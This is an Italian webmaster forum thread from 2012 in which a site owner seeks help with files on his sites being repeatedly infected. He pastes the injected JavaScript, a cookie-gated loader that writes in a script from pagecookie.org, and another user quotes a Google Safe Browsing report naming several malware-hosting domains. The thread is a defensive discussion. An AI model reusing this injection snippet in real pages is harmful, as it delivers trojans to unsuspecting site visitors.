Infezione sito

**blackwolf76** · 08-12-2012, 12:05

Originariamente Scritto da Fabioo

Giusto!

Potresti averli infettati tramite il programma FTP durante il caricamento di qualche file sui server?

Non credo...
il problema si è verifiato adesso e sinceramente tramite ftp non accedo quasi mai salvo problemi o aggiornamenti. Inoltre sul secondo sito non accedevo da ftp dal 2 novembre, data che ho fatto ultimo aggiornamento.

**Fabioo** · 08-12-2012, 12:16

ho capito... non so che dirti, forse hanno scoperto una vulnerabilità importante in qualche plugin che hai installato e tramite dei meta tag che utilizza il plugin sono riusciti a risalire ai forum che lo utilizzano...
Comunque mi sembra di aver capito che il database non viene toccato e questo è un buon segno

,

hai conservato un file infetto?

**blackwolf76** · 08-12-2012, 12:20

Originariamente Scritto da Fabioo

ho capito... non so che dirti, forse hanno scoperto una vulnerabilità importante in qualche plugin che hai installato e tramite dei meta tag che utilizza il plugin sono riusciti a risalire ai forum che lo utilizzano...
Comunque mi sembra di aver capito che il database non viene toccato e questo è un buon segno

,

hai conservato un file infetto?

Fortunatamente il database resta integro, i file vengono modificati quasi tutti, ma quelli che hanno l'infezione sono pochi:

function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document. cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://pagecookie.org/pagecookie.js"></script>');}

**Fabioo** · 08-12-2012, 12:50

quel sito pagecookie da dove va a prendere il javascript fa parte di qualche componente che hai installato?

**blackwolf76** · 08-12-2012, 12:53

Originariamente Scritto da Fabioo

quel sito pagecookie da dove va a prendere il javascript fa parte di qualche componente che hai installato?

purtroppo no...

**Fabioo** · 08-12-2012, 13:01

evviva

sono quasi certo che dipenda da qualche componente che hai installato!
è fondamentale accedere ai log del php! su aruba non credo sia possibile, sul provider dove hai gbc non saprei, informati ed in caso fattelo inviare.. fatto questo, poi me lo invii e me lo spulcio per bene ^^ .. sperando che (quasi sicuramente) utilizzano uno script php per modificare i file!

**blackwolf76** · 08-12-2012, 13:18

Non son riouscito a capire se godaddy mi permette il log, allego immagine del pannello, ma non credo sia possibile.

http://gyazo.com/5903a6c0e3363d9a88b...png?1354965457

**Fabioo** · 08-12-2012, 13:37

no!!

prova a mandargli una email e chiedigli se ti possono mandare i lod di apache del tuo account!

**blackwolf76** · 08-12-2012, 22:30

stasera un altro attacco... non se ne può più. Non trovo il modo per capire il buco...

ora chiedo al provider se mi danno una mano.

**migratoria** · 08-12-2012, 22:56

Qual è lo stato attuale di gbcnet.net
nell'elenco?

Il sito è indicato come sospetto: una visita a questo sito web potrebbe
danneggiare il tuo computer.

Parte del sito è stata segnalata per attività sospetta 4 volte nel corso
degli ultimi 90 giorni.

Che cosa è successo dopo la visita di Google a questo
sito?

Dal test di 406 pagine del sito eseguito negli ultimi 90 giorni, è
emerso che da 21 pagine è stato scaricato e installato software dannoso senza
l'autorizzazione dell'utente. L'ultima visita di Google a questo sito è stata
effettuata in data 2012-12-08 e contenuto sospetto è stato rilevato l'ultima
volta in data 2012-12-08.
Esempi di software dannoso sono: 3 trojan(s). Sono stati infettati in media 1
nuovi processi nel computer target.

Software dannoso è ospitato su 4 domini, tra cui pagecookie.org/, uostutud.epac.to/, uowroth.wha.la/.

2 domini sembravano fungere da intermediari per la distribuzione di malware
ai visitatori di questo sito, tra cui pagecookie.org/, zymurgies.org/.

Questo sito è stato ospitato su 2 reti tra cui AS26496 (PAH), AS15169 (Google Internet
Backbone).

Il sito ha assunto la funzione di intermediario per la
distribuzione di malware?

Nel corso degli ultimi 90 giorni, gbcnet.net non ha assunto la funzione di
intermediario per la distribuzione di malware o virus ad altri
siti.

Questo sito ha ospitato malware?

No, questo sito non ha ospitato software dannoso nel corso degli ultimi 90
giorni.

Ragioni

In alcuni casi, terze parti possono aggiungere codice dannoso a siti
autentici e questo è il motivo alla base della visualizzazione del messaggio di
avviso.

Sicuramente è un plugin con qualche falla a cui è stata applicata una Sql Iniection.

Fai una ricerca per plugin su google aggiungndo come keywords oltre il nome del plugin anche la parola virus o iniection.

Vedrai che risolvi